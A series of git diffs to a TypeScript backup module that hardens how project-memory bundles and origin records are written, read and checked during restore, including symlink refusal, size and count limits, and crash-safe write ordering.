+      // The project's record names only the source; a project has no "previous source" to
+      // fall back to, since a source moving in is what voids its old association.
+      Buffer.from(`${JSON.stringify({ sourcePath, memoryDir: localMemoryDir })}\n`, "utf-8")
     );
   } catch (error) {
     if (previous === "absent") {
@@ -3206,26 +3220,51 @@ async function writeProjectMemoryOriginRecord(
   }
 }
 
+interface ProjectMemoryOriginRecord {
+  sourcePath: string;
+  memoryDir: string;
+  /** On a source's record: the project it was associated with before this one, if any. */
+  previousMemoryDir?: string;
+}
+
+function parseProjectMemoryOriginRecord(content: Buffer): ProjectMemoryOriginRecord | null {
+  let parsed: unknown;
+  try {
+    parsed = JSON.parse(content.toString("utf-8"));
+  } catch {
+    return null;
+  }
+  if (!isPlainObject(parsed)) return null;
+  const { sourcePath, memoryDir, previousMemoryDir } = parsed;
+  if (
+    typeof sourcePath !== "string" ||
+    sourcePath === "" ||
+    typeof memoryDir !== "string" ||
+    memoryDir === ""
+  ) {
+    return null;
+  }
+  return {
+    sourcePath,
+    memoryDir,
+    ...(typeof previousMemoryDir === "string" && previousMemoryDir !== ""
+      ? { previousMemoryDir }
+      : {}),
+  };
+}
+
 /** A record's fields, or null for a missing, unreadable, refused, or malformed one. */
 async function readProjectMemoryOriginRecord(
   root: BackupRoot,
   relativePath: string
-): Promise<{ sourcePath: string; memoryDir: string } | null> {
+): Promise<ProjectMemoryOriginRecord | null> {
   try {
     // The checked reader refuses a symlinked directory or record the same way the writer
     // does, so a planted link cannot re-point a project at another source.
     const { content } = await readCheckedFile(root, relativePath, (size) => {
       if (size > MAX_PROJECT_MEMORY_ORIGIN_BYTES) throw new Error("origin marker too large");
     });
-    const parsed: unknown = JSON.parse(content.toString("utf-8"));
-    if (!isPlainObject(parsed)) return null;
-    const { sourcePath, memoryDir } = parsed;
-    return typeof sourcePath === "string" &&
-      sourcePath !== "" &&
-      typeof memoryDir === "string" &&
-      memoryDir !== ""
-      ? { sourcePath, memoryDir }
-      : null;
+    return parseProjectMemoryOriginRecord(content);
   } catch {
     return null;
   }
@@ -3256,17 +3295,24 @@ export async function readProjectMemoryOrigins(
     // name and with each other, or the record is not this association's (a hand-placed or
     // corrupted file, or a superseded half).
     if (claim?.sourcePath !== sourcePath) continue;
-    const projectPath = projectByDir.get(claim.memoryDir);
-    if (projectPath == null) continue;
     // The project's own record must name this source back: a project imported into again
     // from another source names that source now, and the older claim on it is void even
-    // though the older source's record still exists.
-    const target = await readProjectMemoryOriginRecord(
-      root,
-      projectMemoryOriginTargetPath(claim.memoryDir)
-    );
-    if (target?.sourcePath !== sourcePath || target.memoryDir !== claim.memoryDir) continue;
-    origins.set(sourcePath, { projectPath, memoryDir: claim.memoryDir });
+    // though the older source's record still exists. The project the source came from is
+    // tried second: a re-import interrupted between its two writes (a crash) has updated the
+    // source's record but not the new project's, and the old project's record still
+    // confirms the source, so that association stands until the pair is completed.
+    for (const memoryDir of [claim.memoryDir, claim.previousMemoryDir]) {
+      if (memoryDir === undefined) continue;
+      const projectPath = projectByDir.get(memoryDir);
+      if (projectPath == null) continue;
+      const target = await readProjectMemoryOriginRecord(
+        root,
+        projectMemoryOriginTargetPath(memoryDir)
+      );
+      if (target?.sourcePath !== sourcePath || target.memoryDir !== memoryDir) continue;
+      origins.set(sourcePath, { projectPath, memoryDir });
+      break;
+    }
   }
   return origins;
 }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3081,12 +3081,14 @@ export async function writeProjectMemoryFiles(
           continue;
         }
       }
-      await writeCheckedFile(root, write.path, write.content, false);
+      // Recorded before the mutating call: a write that fails midway (ENOSPC after the
+      // destination was created or truncated) must still appear in the cleanup list.
       written.push(write.path);
+      await writeCheckedFile(root, write.path, write.content, false);
     }
   } catch (error) {
-    // Sequential writes without rollback: report what already landed so the caller's
-    // failure result can double as the cleanup list.
+    // Sequential writes without rollback: report what already landed, including the
+    // attempted file, so the caller's failure result can double as the cleanup list.
     throw new ProjectMemoryWriteError(
       error instanceof Error ? error.message : String(error),
       { written, skipped },

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -2830,7 +2830,18 @@ function parseProjectBundleManifest(raw: string): BackupProjectBundleManifest {
   const tree = jsonc.parseTree(raw);
   if (!tree) throw new Error("Invalid backup project bundle manifest");
   assertNoDuplicateKeys(tree, "backup project bundle manifest");
-  const parsed = BackupProjectBundleManifestSchema.safeParse(JSON.parse(raw));
+  const value: unknown = JSON.parse(raw);
+  // Array lengths are bounded before the per-entry schema runs, as the core manifest parser
+  // does: a manifest-sized array of tiny valid entries would otherwise be fully validated
+  // and copied before the file-count check ever ran.
+  if (!isPlainObject(value) || !Array.isArray(value.files) || !Array.isArray(value.projects)) {
+    throw new Error("Invalid backup project bundle manifest");
+  }
+  assertBackupFileCount(value.files.length);
+  if (value.projects.length > MAX_BACKUP_PROJECT_ENTRIES) {
+    throw new Error(`Backup has more than ${MAX_BACKUP_PROJECT_ENTRIES} projects`);
+  }
+  const parsed = BackupProjectBundleManifestSchema.safeParse(value);
   if (!parsed.success) throw new Error("Invalid backup project bundle manifest");
   return {
     ...parsed.data,

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3045,19 +3045,30 @@ export class ProjectMemoryRestoreError extends Error {
 /**
  * Regular files under a directory as MemoryService counts them for its per-scope cap:
  * dot-prefixed entries (and anything beneath one) are invisible to the memory store, so
- * counting them here would refuse a note the store itself would still create.
+ * counting them here would refuse a note the store itself would still create. The walk
+ * stops as soon as the count exceeds `limit`, so an externally bloated scope cannot make the
+ * preflight materialize its whole tree just to learn it is over the limit.
  */
-async function countFilesUnder(dirAbs: string): Promise<number> {
-  // Recursive readdir does not follow directory symlinks, and a missing scope directory
-  // counts as empty rather than failing the restore.
-  const entries = await fs
-    .readdir(dirAbs, { withFileTypes: true, recursive: true })
-    .catch(() => []);
-  return entries.filter((entry) => {
-    if (!entry.isFile()) return false;
-    const relative = path.relative(dirAbs, path.join(entry.parentPath, entry.name));
-    return !relative.split(path.sep).some(isHiddenName);
-  }).length;
+async function countFilesUnder(dirAbs: string, limit: number): Promise<number> {
+  let count = 0;
+  const pending = [dirAbs];
+  while (pending.length > 0) {
+    const dir = pending.pop();
+    if (dir === undefined) break;
+    // A missing scope directory counts as empty rather than failing the restore.
+    const entries = await fs.readdir(dir, { withFileTypes: true }).catch(() => []);
+    for (const entry of entries) {
+      if (isHiddenName(entry.name)) continue;
+      // Dirent reports a symlink as neither file nor directory, so links are not followed.
+      if (entry.isDirectory()) {
+        pending.push(path.join(dir, entry.name));
+      } else if (entry.isFile()) {
+        count += 1;
+        if (count > limit) return count;
+      }
+    }
+  }
+  return count;
 }
 
 /**
@@ -3159,7 +3170,10 @@ async function planProjectMemoryWrites(
     addsByDir.set(scopeDir, (addsByDir.get(scopeDir) ?? 0) + 1);
   }
   for (const [scopeDir, adds] of addsByDir) {
-    const existingCount = await countFilesUnder(path.join(root.path, scopeDir));
+    const existingCount = await countFilesUnder(
+      path.join(root.path, scopeDir),
+      MEMORY_MAX_FILES_PER_SCOPE
+    );
     if (existingCount + adds > MEMORY_MAX_FILES_PER_SCOPE && adds > 0) {
       throw new Error(
         `Cannot restore '${scopeDir}': it would exceed the ${MEMORY_MAX_FILES_PER_SCOPE}-file memory limit`

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -265,6 +265,20 @@ async function lstatOrNull(target: string) {
   }
 }
 
+/**
+ * `null` only when the path does not exist. Any other failure (`EACCES` on an unreadable
+ * parent, `EIO`) propagates: a preflight that read it as "missing" would accept a write the
+ * filesystem is about to refuse, after the point where refusing changes nothing.
+ */
+async function lstatIfExists(target: string): Promise<Stats | null> {
+  try {
+    return await fs.lstat(target);
+  } catch (error) {
+    if (isErrnoWithCode(error, "ENOENT") || isErrnoWithCode(error, "ENOTDIR")) return null;
+    throw error;
+  }
+}
+
 /** Filesystem identity detects aliases across hard links, case folding, and normalization. */
 async function localFilesOverwrittenByPayload(
   muxRoot: string,
@@ -3203,8 +3217,13 @@ async function countFilesUnder(dirAbs: string, limit: number): Promise<number> {
   while (pending.length > 0) {
     const dir = pending.pop();
     if (dir === undefined) break;
-    // A missing scope directory counts as empty rather than failing the restore.
-    const entries = await fs.readdir(dir, { withFileTypes: true }).catch(() => []);
+    // A missing scope directory counts as empty rather than failing the restore. Nothing
+    // else does: a directory that exists but cannot be read (permissions changed) would
+    // otherwise pass the preflight and fail the write after the core settings changed.
+    const entries = await fs.readdir(dir, { withFileTypes: true }).catch((error: unknown) => {
+      if (isErrnoWithCode(error, "ENOENT") || isErrnoWithCode(error, "ENOTDIR")) return [];
+      throw error;
+    });
     for (const entry of entries) {
       if (isHiddenName(entry.name)) continue;
       // Dirent reports a symlink as neither file nor directory, so links are not followed.
@@ -3238,24 +3257,15 @@ export async function writeProjectMemoryFiles(
   const root = await resolveRoot(muxRoot);
   // Re-run under the lock even when the caller already ran it as a preflight: the
   // destinations may have changed since, and these checks are what make the write safe.
-  const planned = await planProjectMemoryWrites(root, writes);
+  const planned = await planProjectMemoryWrites(root, writes, options);
   const written: string[] = [];
   const skipped: string[] = [];
   try {
     for (const write of planned) {
-      if (write.existingSize !== null) {
-        // Sizes first, from the planning lstat: an existing file of a different size can
-        // never be identical, so it is never read — an externally bloated destination would
-        // otherwise be buffered whole just to detect a conflict. Equal sizes are bounded by
-        // the incoming file's own memory limit.
-        if (write.existingSize === write.content.length) {
-          const current = await readCheckedFile(root, write.path, () => undefined);
-          if (current.content.equals(write.content)) continue;
-        }
-        if (options.addOnly) {
-          skipped.push(write.path);
-          continue;
-        }
+      if (write.action === "identical") continue;
+      if (write.action === "conflict") {
+        skipped.push(write.path);
+        continue;
       }
       // Recorded before the mutating call: a write that fails midway (ENOSPC after the
       // destination was created or truncated) must still appear in the cleanup list.
@@ -3276,26 +3286,41 @@ export async function writeProjectMemoryFiles(
 
 /**
  * Everything about a set of project-memory writes that can be refused without touching the
- * disk: path shape, the memory subsystem's per-file size and per-scope count limits, and
- * destinations that are not plain files. Exposed so the restore preflight can refuse a
- * bundle that would fail here before the core restore has overwritten anything.
+ * disk: path shape, the memory subsystem's per-file size and per-scope count limits,
+ * destinations that are not plain files, and destinations the write could not open.
+ * Exposed so the restore preflight can refuse a bundle that would fail here before the
+ * core restore has overwritten anything. `addOnly` must match the write it stands in for:
+ * it decides which existing destinations are skipped and therefore need no permission.
  */
 export async function assertProjectMemoryWritesAllowed(
   muxRoot: string,
-  writes: ReadonlyArray<{ path: string; content: Buffer }>
+  writes: ReadonlyArray<{ path: string; content: Buffer }>,
+  options: { addOnly: boolean }
 ): Promise<void> {
-  await planProjectMemoryWrites(await resolveRoot(muxRoot), writes);
+  await planProjectMemoryWrites(await resolveRoot(muxRoot), writes, options);
+}
+
+interface PlannedProjectMemoryWrite {
+  path: string;
+  content: Buffer;
+  /**
+   * `write`: lands (new file, or an existing one this mode overwrites). `identical`: the
+   * destination already holds these bytes. `conflict`: differs and add-only mode skips it.
+   */
+  action: "write" | "identical" | "conflict";
+  isNew: boolean;
 }
 
 async function planProjectMemoryWrites(
   root: BackupRoot,
-  writes: ReadonlyArray<{ path: string; content: Buffer }>
-): Promise<Array<{ path: string; content: Buffer; existingSize: number | null }>> {
+  writes: ReadonlyArray<{ path: string; content: Buffer }>,
+  options: { addOnly: boolean }
+): Promise<PlannedProjectMemoryWrite[]> {
   // Charged so a marker-thin bundle cannot expand past the same bound reads enforce.
   const budget = createByteBudget();
   // Everything refusable is refused before the first write, so a rejected bundle
   // changes nothing on disk.
-  const planned: Array<{ path: string; content: Buffer; existingSize: number | null }> = [];
+  const planned: PlannedProjectMemoryWrite[] = [];
   for (const write of writes) {
     assertAllowedBundleFilePath(write.path);
     // The memory subsystem's own read limit: a restored file larger than this would be
@@ -3308,22 +3333,39 @@ async function planProjectMemoryWrites(
     }
     budget(write.path, write.content.length);
     const destination = await resolveContainedPath(root.path, write.path);
-    const existing = await lstatOrNull(destination);
+    const existing = await lstatIfExists(destination);
     if (existing !== null && !existing.isFile()) {
       throw new Error(`Cannot restore '${write.path}': a non-file already exists there`);
     }
-    planned.push({
-      path: write.path,
-      content: write.content,
-      existingSize: existing === null ? null : existing.size,
-    });
+    let action: PlannedProjectMemoryWrite["action"] = "write";
+    if (existing !== null) {
+      // Sizes first, from the lstat: an existing file of a different size can never be
+      // identical, so it is never read — an externally bloated destination would otherwise
+      // be buffered whole just to detect a conflict. Equal sizes are bounded by the incoming
+      // file's own memory limit. Decided here, once, so the writability probe below covers
+      // exactly the destinations the write will open.
+      if (
+        existing.size === write.content.length &&
+        (await readCheckedFile(root, write.path, () => undefined)).content.equals(write.content)
+      ) {
+        action = "identical";
+      } else if (options.addOnly) {
+        action = "conflict";
+      }
+    }
+    // The same probe as the core restore's planner: a read-only destination or an
+    // unwritable parent fails `writeCheckedFile` with the core settings already changed,
+    // so the permission the write will need is checked while nothing has changed yet.
+    if (action === "write")
+      await assertRestoreDestinationWritable(destination, existing, write.path);
+    planned.push({ path: write.path, content: write.content, action, isNew: existing === null });
   }
   // Per-scope file-count cap, mirrored from MemoryService. Only growth past the limit is
   // refused: a store that already exceeds it (hand-placed files) can still be restored
   // in place as long as this restore does not add to the overflow.
   const addsByDir = new Map<string, number>();
   for (const write of planned) {
-    if (write.existingSize !== null) continue;
+    if (!write.isNew) continue;
     const scopeDir = write.path.split("/").slice(0, 3).join("/");
     addsByDir.set(scopeDir, (addsByDir.get(scopeDir) ?? 0) + 1);
   }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3137,16 +3137,50 @@ export async function writeProjectMemoryOrigin(
   if (content.length > MAX_PROJECT_MEMORY_ORIGIN_BYTES) {
     throw new Error("Cannot record the imported project's origin: the marker is too large");
   }
-  // The source's record first, then the project's. Should the second write fail, the
-  // source's old project (if any) still names a different source and this project's record
-  // still names its previous source, so the reader confirms neither new half: the previous
-  // associations stand, and the import is reported failed for a clean retry.
-  await writeProjectMemoryOriginRecord(root, projectMemoryOriginPath(sourcePath), content);
-  await writeProjectMemoryOriginRecord(
-    root,
-    projectMemoryOriginTargetPath(localMemoryDir),
-    content
-  );
+  // Two files cannot change atomically, so the source's record goes first and is put back
+  // the way it was if the project's record then cannot be written: otherwise a failed
+  // re-import of a source elsewhere would leave neither its old association nor its new one
+  // with two agreeing halves, and later restores would stop matching the project it still
+  // lives in. The restore is best effort under the same I/O conditions that failed the
+  // write; if it fails too, the reader confirms neither half rather than a wrong one.
+  const sourceRecord = projectMemoryOriginPath(sourcePath);
+  const previous = await readProjectMemoryOriginRecordBytes(root, sourceRecord);
+  await writeProjectMemoryOriginRecord(root, sourceRecord, content);
+  try {
+    await writeProjectMemoryOriginRecord(
+      root,
+      projectMemoryOriginTargetPath(localMemoryDir),
+      content
+    );
+  } catch (error) {
+    if (previous === "absent") {
+      await fs.rm(absolutePathOf(root.path, sourceRecord), { force: true }).catch(() => undefined);
+    } else if (previous !== "unreadable") {
+      await writeProjectMemoryOriginRecord(root, sourceRecord, previous).catch(() => undefined);
+    }
+    throw error;
+  }
+}
+
+/**
+ * A record's current bytes for putting it back, `"absent"` when there is none, and
+ * `"unreadable"` when it exists but cannot be read — in which case nothing can be restored,
+ * and the caller leaves the new record in place for the reader to refuse.
+ */
+async function readProjectMemoryOriginRecordBytes(
+  root: BackupRoot,
+  relativePath: string
+): Promise<Buffer | "absent" | "unreadable"> {
+  if ((await lstatIfExists(absolutePathOf(root.path, relativePath))) === null) return "absent";
+  try {
+    return (
+      await readCheckedFile(root, relativePath, (size) => {
+        if (size > MAX_PROJECT_MEMORY_ORIGIN_BYTES) throw new Error("origin marker too large");
+      })
+    ).content;
+  } catch {
+    return "unreadable";
+  }
 }
 
 async function writeProjectMemoryOriginRecord(

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3211,17 +3211,18 @@ export async function collectOverwritableProjectMemory(
   const entries = [...matched.map((match) => match.entry)].sort((a, b) =>
     a.path.localeCompare(b.path)
   );
-  return {
-    manifest: {
-      schemaVersion: 1,
-      projects: entries.map((entry) => ({
-        path: entry.path,
-        name: entry.name,
-        ...(entry.gitRemote !== undefined ? { gitRemote: entry.gitRemote } : {}),
-        memoryDir: entry.memoryDir,
-      })),
-      files: files.map((file) => ({ path: file.path, sha256: sha256(file.content) })),
-    },
-    files,
+  const manifest: BackupProjectBundleManifest = {
+    schemaVersion: 1,
+    projects: entries.map((entry) => ({
+      path: entry.path,
+      name: entry.name,
+      ...(entry.gitRemote !== undefined ? { gitRemote: entry.gitRemote } : {}),
+      memoryDir: entry.memoryDir,
+    })),
+    files: files.map((file) => ({ path: file.path, sha256: sha256(file.content) })),
   };
+  // The writer charges the manifest against the same budget, so a preflight that skipped
+  // it could pass a recovery copy the write would then refuse.
+  budget(BACKUP_MANIFEST_FILE, serializeProjectBundleManifest(manifest).length);
+  return { manifest, files };
 }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3128,23 +3128,8 @@ export async function writeProjectMemoryOrigin(
   sourcePath: string
 ): Promise<void> {
   const root = await resolveRoot(muxRoot);
-  const sourceRecord = projectMemoryOriginPath(sourcePath);
-  const previous = await readProjectMemoryOriginRecordBytes(root, sourceRecord);
-  // The source's new record names the project it is leaving, if any: two files cannot change
-  // atomically, and a crash between the two writes is not an exception the rollback below
-  // can catch. With the previous project on record, the reader can still confirm the old
-  // association through that project's own record until the new pair is complete.
-  const previousMemoryDir = Buffer.isBuffer(previous)
-    ? parseProjectMemoryOriginRecord(previous)?.memoryDir
-    : undefined;
   const content = Buffer.from(
-    `${JSON.stringify({
-      sourcePath,
-      memoryDir: localMemoryDir,
-      ...(previousMemoryDir !== undefined && previousMemoryDir !== localMemoryDir
-        ? { previousMemoryDir }
-        : {}),
-    })}\n`,
+    `${JSON.stringify({ sourcePath, memoryDir: localMemoryDir })}\n`,
     "utf-8"
   );
   // The reader's cap, checked before writing: an import must not report success with a
@@ -3152,25 +3137,30 @@ export async function writeProjectMemoryOrigin(
   if (content.length > MAX_PROJECT_MEMORY_ORIGIN_BYTES) {
     throw new Error("Cannot record the imported project's origin: the marker is too large");
   }
-  // The source's record goes first and is put back the way it was if the project's record
-  // then cannot be written: otherwise a failed re-import of a source elsewhere would leave
-  // neither its old association nor its new one with two agreeing halves. Best effort under
-  // the same I/O conditions that failed the write; if it fails too, `previousMemoryDir`
-  // above still lets the reader confirm the old association.
-  await writeProjectMemoryOriginRecord(root, sourceRecord, content);
+  // Two files cannot change atomically, so the order decides what a crash between the two
+  // writes leaves behind. The project's record goes first and the source's record is the
+  // commit point: until it is replaced, the source's previous association (if any) still has
+  // both of its halves untouched and stays confirmed, and the project's new record names a
+  // source that does not point back — a claim nothing confirms, exactly like a project whose
+  // source was imported elsewhere. The other order would void the previous association
+  // first, and no crash-recovery rule on the source's record can tell an incomplete write
+  // from a completed association that another import into the same project superseded.
+  // The project's record was the half the import's memory write had already committed to.
+  const targetRecord = projectMemoryOriginTargetPath(localMemoryDir);
+  const previousTarget = await readProjectMemoryOriginRecordBytes(root, targetRecord);
+  await writeProjectMemoryOriginRecord(root, targetRecord, content);
   try {
-    await writeProjectMemoryOriginRecord(
-      root,
-      projectMemoryOriginTargetPath(localMemoryDir),
-      // The project's record names only the source; a project has no "previous source" to
-      // fall back to, since a source moving in is what voids its old association.
-      Buffer.from(`${JSON.stringify({ sourcePath, memoryDir: localMemoryDir })}\n`, "utf-8")
-    );
+    await writeProjectMemoryOriginRecord(root, projectMemoryOriginPath(sourcePath), content);
   } catch (error) {
-    if (previous === "absent") {
-      await fs.rm(absolutePathOf(root.path, sourceRecord), { force: true }).catch(() => undefined);
-    } else if (previous !== "unreadable") {
-      await writeProjectMemoryOriginRecord(root, sourceRecord, previous).catch(() => undefined);
+    // Put the project's record back so a failed import does not void the association the
+    // project had before it. Best effort under the same I/O conditions that failed the write;
+    // if it fails too, the reader confirms neither half rather than a wrong one.
+    if (previousTarget === "absent") {
+      await fs.rm(absolutePathOf(root.path, targetRecord), { force: true }).catch(() => undefined);
+    } else if (previousTarget !== "unreadable") {
+      await writeProjectMemoryOriginRecord(root, targetRecord, previousTarget).catch(
+        () => undefined
+      );
     }
     throw error;
   }
@@ -3223,8 +3213,6 @@ async function writeProjectMemoryOriginRecord(
 interface ProjectMemoryOriginRecord {
   sourcePath: string;
   memoryDir: string;
-  /** On a source's record: the project it was associated with before this one, if any. */
-  previousMemoryDir?: string;
 }
 
 function parseProjectMemoryOriginRecord(content: Buffer): ProjectMemoryOriginRecord | null {
@@ -3235,7 +3223,7 @@ function parseProjectMemoryOriginRecord(content: Buffer): ProjectMemoryOriginRec
     return null;
   }
   if (!isPlainObject(parsed)) return null;
-  const { sourcePath, memoryDir, previousMemoryDir } = parsed;
+  const { sourcePath, memoryDir } = parsed;
   if (
     typeof sourcePath !== "string" ||
     sourcePath === "" ||
@@ -3244,13 +3232,7 @@ function parseProjectMemoryOriginRecord(content: Buffer): ProjectMemoryOriginRec
   ) {
     return null;
   }
-  return {
-    sourcePath,
-    memoryDir,
-    ...(typeof previousMemoryDir === "string" && previousMemoryDir !== ""
-      ? { previousMemoryDir }
-      : {}),
-  };
+  return { sourcePath, memoryDir };
 }
 
 /** A record's fields, or null for a missing, unreadable, refused, or malformed one. */
@@ -3297,37 +3279,18 @@ export async function readProjectMemoryOrigins(
     if (claim?.sourcePath !== sourcePath) continue;
     // The project's own record must name this source back: a project imported into again
     // from another source names that source now, and the older claim on it is void even
-    // though the older source's record still exists.
-    const targetBytes = await readProjectMemoryOriginRecordBytes(
+    // though the older source's record still exists. There is no fallback from an
+    // unconfirmed claim to an earlier association: the writer's order (see
+    // writeProjectMemoryOrigin) keeps an earlier association's own two halves intact until
+    // the new pair is complete, so it is found here directly or not at all.
+    const target = await readProjectMemoryOriginRecord(
       root,
       projectMemoryOriginTargetPath(claim.memoryDir)
     );
-    let memoryDir: string | undefined;
-    if (targetBytes === "absent") {
-      // No record at all for the new project: the re-import that wrote this claim was
-      // interrupted between its two writes, so the pair is provably incomplete and the
-      // project the source came from — whose record a crash leaves intact — still confirms
-      // the association. Only then: a record that exists but names another source means the
-      // pair was completed and later superseded (or the project was imported into meanwhile),
-      // and the previous project's stale record must not bring the old association back.
-      const previousDir = claim.previousMemoryDir;
-      const previous =
-        previousDir === undefined
-          ? null
-          : await readProjectMemoryOriginRecord(root, projectMemoryOriginTargetPath(previousDir));
-      if (previous?.sourcePath === sourcePath && previous.memoryDir === previousDir) {
-        memoryDir = previousDir;
-      }
-    } else if (Buffer.isBuffer(targetBytes)) {
-      const target = parseProjectMemoryOriginRecord(targetBytes);
-      if (target?.sourcePath === sourcePath && target.memoryDir === claim.memoryDir) {
-        memoryDir = claim.memoryDir;
-      }
-    }
-    if (memoryDir === undefined) continue;
-    const projectPath = projectByDir.get(memoryDir);
+    if (target?.sourcePath !== sourcePath || target.memoryDir !== claim.memoryDir) continue;
+    const projectPath = projectByDir.get(claim.memoryDir);
     if (projectPath == null) continue;
-    origins.set(sourcePath, { projectPath, memoryDir });
+    origins.set(sourcePath, { projectPath, memoryDir: claim.memoryDir });
   }
   return origins;
 }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -2835,11 +2835,13 @@ export async function assertManagedTreeWithinLimits(destinationDir: string): Pro
  * while `includeProjects` is off without ever blocking a core-only restore on its contents.
  */
 export async function projectBundleExists(sourceDir: string): Promise<boolean> {
-  // lstat, never stat: on hosts where git materializes symlinks, a crafted sidecar manifest
-  // pointing at a UNC path would otherwise be followed here — reached even with project
-  // backup off — and Windows would start SMB authentication. A symlinked manifest is
-  // treated as absent; the full read refuses it anyway.
-  const stat = await lstatOrNull(path.join(sourceDir, PROJECT_BUNDLE_DIR, BACKUP_MANIFEST_FILE));
+  // lstat at both levels, never stat: on hosts where git materializes symlinks, a crafted
+  // sidecar directory or manifest pointing at a UNC path would otherwise be followed here —
+  // reached even with project backup off — and Windows would start SMB authentication. A
+  // symlinked directory or manifest is treated as absent; the full read refuses it anyway.
+  const bundleDir = path.join(sourceDir, PROJECT_BUNDLE_DIR);
+  if ((await lstatOrNull(bundleDir))?.isDirectory() !== true) return false;
+  const stat = await lstatOrNull(path.join(bundleDir, BACKUP_MANIFEST_FILE));
   return stat?.isFile() === true;
 }
 

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -3083,8 +3083,9 @@ export function matchedProjectWrites(
 const PROJECT_MEMORY_ORIGINS_DIR = "memory/.backup-origins";
 const MAX_PROJECT_MEMORY_ORIGIN_BYTES = 4096;
 
-function projectMemoryOriginPath(rootPath: string, localMemoryDir: string): string {
-  return path.join(rootPath, ...PROJECT_MEMORY_ORIGINS_DIR.split("/"), `${localMemoryDir}.json`);
+/** Root-relative, so the checked reader and writer walk every component below the root. */
+function projectMemoryOriginPath(localMemoryDir: string): string {
+  return `${PROJECT_MEMORY_ORIGINS_DIR}/${localMemoryDir}.json`;
 }
 
 export async function writeProjectMemoryOrigin(
@@ -3093,9 +3094,18 @@ export async function writeProjectMemoryOrigin(
   sourcePath: string
 ): Promise<void> {
   const root = await resolveRoot(muxRoot);
-  const marker = projectMemoryOriginPath(root.path, localMemoryDir);
-  await fs.mkdir(path.dirname(marker), { recursive: true });
-  await fs.writeFile(marker, `${JSON.stringify({ sourcePath })}\n`, "utf-8");
+  const relativePath = projectMemoryOriginPath(localMemoryDir);
+  // Contained and then written through the checked writer, like every other file a restore
+  // lands: `.backup-origins` or the marker itself left behind as a symlink (a copied or
+  // corrupted Xum home) would otherwise be followed, and an approved import would replace a
+  // file outside the memory tree with backup-controlled JSON.
+  await resolveContainedPath(root.path, relativePath);
+  await writeCheckedFile(
+    root,
+    relativePath,
+    Buffer.from(`${JSON.stringify({ sourcePath })}\n`, "utf-8"),
+    false
+  );
 }
 
 /**
@@ -3111,14 +3121,21 @@ export async function readProjectMemoryOrigins(
   const origins = new Map<string, ProjectMemoryOrigin>();
   const registered = [...registeredDirByPath.entries()].sort(([a], [b]) => a.localeCompare(b));
   for (const [projectPath, memoryDir] of registered) {
-    const marker = projectMemoryOriginPath(root.path, memoryDir);
-    const stat = await lstatOrNull(marker);
-    if (stat?.isFile() !== true || stat.size > MAX_PROJECT_MEMORY_ORIGIN_BYTES) continue;
     let sourcePath: unknown;
     try {
-      const parsed: unknown = JSON.parse(await fs.readFile(marker, "utf-8"));
+      // The checked reader refuses a symlinked directory or marker the same way the
+      // writer does, so a planted link cannot re-point a project at another source.
+      const { content } = await readCheckedFile(
+        root,
+        projectMemoryOriginPath(memoryDir),
+        (size) => {
+          if (size > MAX_PROJECT_MEMORY_ORIGIN_BYTES) throw new Error("origin marker too large");
+        }
+      );
+      const parsed: unknown = JSON.parse(content.toString("utf-8"));
       sourcePath = isPlainObject(parsed) ? parsed.sourcePath : undefined;
     } catch {
+      // Missing, unreadable, or refused: the project simply has no recorded origin.
       continue;
     }
     if (typeof sourcePath !== "string" || sourcePath === "" || origins.has(sourcePath)) continue;

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -8,17 +8,31 @@ import {
   type UserPreferences,
 } from "@/common/config/schemas/userPreferences";
 import {
+  BackupProjectBundleManifestSchema,
   CREDENTIAL_URL_PARAMETER_NAMES,
+  MAX_BACKUP_PROJECT_ENTRIES,
   decodeDelimitersOnce,
   hasCredentialUrlParameters,
   isWindowsUnusableSegment,
+  sanitizeBackupGitRemote,
+  type BackupProjectBundleEntry,
+  type BackupProjectBundleManifest,
 } from "@/common/config/schemas/settingsBackup";
+import { projectPathHashSuffix } from "@/node/services/memoryService";
 import { isPlainObject } from "@/common/utils/isPlainObject";
 import { isErrnoWithCode } from "@/node/utils/fs";
-import type { BackupCommandApproval } from "@/common/orpc/schemas/backup";
+import type { BackupCommandApproval, BackupProjectImport } from "@/common/orpc/schemas/backup";
 
 export const BACKUP_SCHEMA_VERSION = 1;
 export const BACKUP_MANIFEST_FILE = "manifest.json";
+/**
+ * The opt-in project bundle lives beside the core payload, never inside its manifest: an
+ * old build's `parseManifest` hard-fails on unknown paths, so listing bundle files there
+ * would brick preview and restore on downgrade, while a sidecar directory is silently
+ * ignored by the manifest-driven reader.
+ */
+export const PROJECT_BUNDLE_DIR = "project-bundle";
+const PROJECT_MEMORY_PATH_PREFIX = "memory/project/";
 /**
  * A payload is read wholly into memory on both sides, and the repository side is written by
  * whoever can push to the branch, so an oversized entry would crash the main process during
@@ -143,6 +157,22 @@ export class BackupCommandApprovalRequiredError extends Error {
   }
 }
 
+/**
+ * Mirrors BackupCommandApprovalRequiredError for project imports: thrown when a restore
+ * names an import token the currently checked-out payload does not produce, carrying the
+ * fresh candidate list so the UI can re-present it without another preview.
+ */
+export class BackupProjectImportApprovalRequiredError extends Error {
+  readonly code = "PROJECT_IMPORT_APPROVAL_REQUIRED";
+
+  constructor(readonly projectImports: readonly BackupProjectImport[]) {
+    super(
+      "The approved project imports no longer match the backup. Review and approve the current list before restoring."
+    );
+    this.name = "BackupProjectImportApprovalRequiredError";
+  }
+}
+
 export interface RestoreBackupPayloadResult {
   /**
    * The backup's preferences document, unmerged and absent when the payload carries none.
@@ -188,17 +218,13 @@ function backupPathSegments(relativePath: string): string[] {
 }
 
 /**
- * Local safety snapshots use `portable: false` so cross-platform filename checks cannot block
- * a restore while protecting a file valid on the current filesystem. Containment and allowlist
- * checks still apply.
+ * The shape rules every payload path shares, independent of which allowlist it must also
+ * satisfy: the core payload and the project bundle validate different path sets but reject
+ * the same traversal, hidden-name, forbidden-basename, and portability hazards.
  */
-function assertAllowedPayloadPath(
